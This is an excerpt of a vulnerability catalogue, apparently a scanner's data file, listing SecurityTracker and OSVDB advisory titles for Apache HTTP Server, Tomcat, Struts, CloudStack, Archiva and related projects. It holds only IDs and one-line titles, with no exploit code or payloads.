16682| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
16683| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
16684| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
16685| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
16686| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
16687| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
16688| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
16689| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
16690| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
16691| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
16692| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
16693| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
16694| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
16695| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
16696| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
16697| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
16698| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
16699| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
16700| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
16701| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
16702|
16703| OSVDB - http://www.osvdb.org:
16704| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
16705| [96077] Apache CloudStack Global Settings Multiple Field XSS
16706| [96076] Apache CloudStack Instances Menu Display Name Field XSS
16707| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
16708| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
16709| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
16710| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
16711| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
16712| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
16713| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
16714| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
16715| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
16716| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16717| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
16718| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
16719| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
16720| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
16721| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
16722| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
16723| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
16724| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
16725| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
16726| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
16727| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
16728| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
16729| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
16730| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
16731| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
16732| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
16733| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
16734| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
16735| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
16736| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
16737| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
16738| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
16739| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
16740| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
16741| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
16742| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
16743| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
16744| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
16745| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
16746| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
16747| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
16748| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
16749| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
16750| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
16751| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
16752| [94279] Apache Qpid CA Certificate Validation Bypass
16753| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
16754| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
16755| [94042] Apache Axis JAX-WS Java Unspecified Exposure
16756| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
16757| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
16758| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
16759| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
16760| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
16761| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
16762| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
16763| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
16764| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
16765| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
16766| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
16767| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
16768| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
16769| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
16770| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
16771| [93541] Apache Solr json.wrf Callback XSS
16772| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
16773| [93521] Apache jUDDI Security API Token Session Persistence Weakness
16774| [93520] Apache CloudStack Default SSL Key Weakness
16775| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
16776| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
16777| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
16778| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
16779| [93515] Apache HBase table.jsp name Parameter XSS
16780| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
16781| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
16782| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
16783| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
16784| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
16785| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
16786| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
16787| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
16788| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
16789| [93252] Apache Tomcat FORM Authenticator Session Fixation
16790| [93172] Apache Camel camel/endpoints/ Endpoint XSS
16791| [93171] Apache Sling HtmlResponse Error Message XSS
16792| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
16793| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
16794| [93168] Apache Click ErrorReport.java id Parameter XSS
16795| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
16796| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
16797| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
16798| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
16799| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
16800| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
16801| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
16802| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
16803| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
16804| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
16805| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
16806| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
16807| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
16808| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
16809| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
16810| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
16811| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
16812| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
16813| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
16814| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
16815| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
16816| [93144] Apache Solr Admin Command Execution CSRF
16817| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
16818| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
16819| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
16820| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
16821| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
16822| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
16823| [92748] Apache CloudStack VM Console Access Restriction Bypass
16824| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
16825| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
16826| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
16827| [92706] Apache ActiveMQ Debug Log Rendering XSS
16828| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
16829| [92270] Apache Tomcat Unspecified CSRF
16830| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
16831| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
16832| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
16833| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
16834| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
16835| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
16836| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
16837| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
16838| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
16839| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
16840| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
16841| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
16842| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
16843| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
16844| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
16845| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
16846| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
16847| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
16848| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
16849| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
16850| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
16851| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
16852| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
16853| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
16854| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
16855| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
16856| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
16857| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
16858| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
16859| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
16860| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
16861| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
16862| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
16863| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
16864| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
16865| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
16866| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
16867| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
16868| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
16869| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
16870| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
16871| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
16872| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
16873| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
16874| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
16875| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
16876| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
16877| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
16878| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
16879| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
16880| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
16881| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
16882| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
16883| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
16884| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
16885| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
16886| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
16887| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
16888| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
16889| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
16890| [86901] Apache Tomcat Error Message Path Disclosure
16891| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
16892| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
16893| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
16894| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
16895| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
16896| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
16897| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
16898| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
16899| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
16900| [85430] Apache mod_pagespeed Module Unspecified XSS
16901| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
16902| [85249] Apache Wicket Unspecified XSS
16903| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
16904| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
16905| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
16906| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
16907| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
16908| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
16909| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
16910| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
16911| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
16912| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
16913| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
16914| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
16915| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
16916| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
16917| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
16918| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
16919| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
16920| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
16921| [83339] Apache Roller Blogger Roll Unspecified XSS
16922| [83270] Apache Roller Unspecified Admin Action CSRF
16923| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
16924| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
16925| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
16926| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
16927| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
16928| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
16929| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
16930| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
16931| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
16932| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
16933| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
16934| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
16935| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
16936| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
16937| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
16938| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
16939| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
16940| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
16941| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
16942| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
16943| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
16944| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
16945| [80300] Apache Wicket wicket:pageMapName Parameter XSS
16946| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
16947| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
16948| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
16949| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
16950| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
16951| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
16952| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
16953| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
16954| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
16955| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
16956| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
16957| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
16958| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
16959| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
16960| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
16961| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
16962| [78331] Apache Tomcat Request Object Recycling Information Disclosure
16963| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
16964| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
16965| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
16966| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
16967| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
16968| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
16969| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
16970| [77593] Apache Struts Conversion Error OGNL Expression Injection
16971| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
16972| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
16973| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
16974| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
16975| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
16976| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
16977| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
16978| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
16979| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
16980| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
16981| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
16982| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
16983| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
16984| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
16985| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
16986| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
16987| [74725] Apache Wicket Multi Window Support Unspecified XSS
16988| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
16989| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
16990| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
16991| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
16992| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
16993| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
16994| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
16995| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
16996| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
16997| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
16998| [73644] Apache XML Security Signature Key Parsing Overflow DoS
16999| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
17000| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
17001| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
17002| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
17003| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
17004| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
17005| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
17006| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
17007| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
17008| [73154] Apache Archiva Multiple Unspecified CSRF
17009| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
17010| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
17011| [72238] Apache Struts Action / Method Names <
17012| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
17013| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
17014| [71557] Apache Tomcat HTML Manager Multiple XSS
17015| [71075] Apache Archiva User Management Page XSS
17016| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
17017| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
17018| [70924] Apache Continuum Multiple Admin Function CSRF
17019| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
17020| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
17021| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
17022| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
17023| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
17024| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
17025| [69520] Apache Archiva Administrator Credential Manipulation CSRF
17026| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
17027| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
17028| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
